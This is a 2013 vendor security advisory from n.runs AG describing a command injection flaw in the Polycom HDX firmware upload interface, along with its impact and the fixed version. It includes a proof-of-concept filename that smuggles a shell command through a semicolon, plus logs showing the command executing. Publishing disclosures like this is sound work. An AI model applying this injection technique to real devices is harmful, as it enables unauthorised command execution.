n.runs AG
http://www.nruns.com/
security(at)nruns.com
n.runs-SA-2013.002
15-Mar-2013
___________________________________________________________________________
Vendor:    Polycom, http://www.polycom.com
Affected Products:  Polycom HDX Series
Affected Version:  < 3.1.1.2
Vulnerability:    Polycom Firmware Update Command Injection
Risk:      MEDIUM
___________________________________________________________________________

Overview:

Polycom HDX systems can be upgraded via Polycom Update Files (PUP files).
The upgrade functionality is available in the Polycom administrative web
interface.

Description:

The firmware update functionality in the Polycom web interface is
vulnerable to a simple command injection vulnerability which allows an
attacker with access to the web interface to execute arbitrary commands
on the underlying embedded Linux system.

When uploading a PUP file via the web interface the file is first stored
on the device and then the filename is passed as an argument to a call
to the "puputils.ppc" binary in order to verify its integrity. Missing
input validation allows an attacker to inject additional shell commands
by using shell metacharacters (such as a semicolon). In order to mount the
attack a valid PUP file can be renamed as follows:

    $ mv polycom-hdx-release-3.0.5-22695.pup 'test;logger PWNED;bla.pup'

When this file is uploaded through the web interface the injected command
"logger PWNED" is executed on the system. This can also be observed in
the logs:

2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: Welcome to the PUP
Utilities.   
2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: Verifying the
integrity of the PUP file "../web2/docroot/data/test"  
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: Unable to open file
"../web2/docroot/data/test".  
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: CalculateFileSHA1 on
pup file failed  
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: Unable to open file
"../web2/docroot/data/test".  
2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: returning
PUP_ERR_FILE_CANT_ACCESS  
2012-09-02 20:17:01 INFO root: pwned
2012-09-02 20:17:01 INFO jvm: pc[0]: system_pthread: ./puputils.ppc verify
../web2/docroot/data/test;logger pwned;bla.pup [32512]  
2012-09-02 20:17:01 ERROR jvm: pc[0]: softupdate: command "./puputils.ppc
verify ../web2/docroot/data/test;logger pwned;bla.pup" returned unexpected
error 127.

Impact:

Someone with access to the Polycom administrative web interface can
execute arbitrary commands on the underlying embedded Linux system.
In combination with some other vulnerability such as a Cross-Site
Request Forgery vulnerability this attack could potentially be
performed even without direct access to the web interface. However
we didn't verify that yet.

Solution:

Polycom released version 3.1.1.2 of the HDX software which fixes this
issue. It can be downloaded from the Polycom Support page at
http://support.polycom.com.
___________________________________________________________________________

Credit:
Bug found by Moritz Jodeit of n.runs AG.
___________________________________________________________________________

Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
security@nruns.com for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded.
In no event shall n.runs be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages, even if n.runs has been advised of the possibility of
such damages.

Copyright 2013 n.runs AG. All rights reserved. Terms of use apply.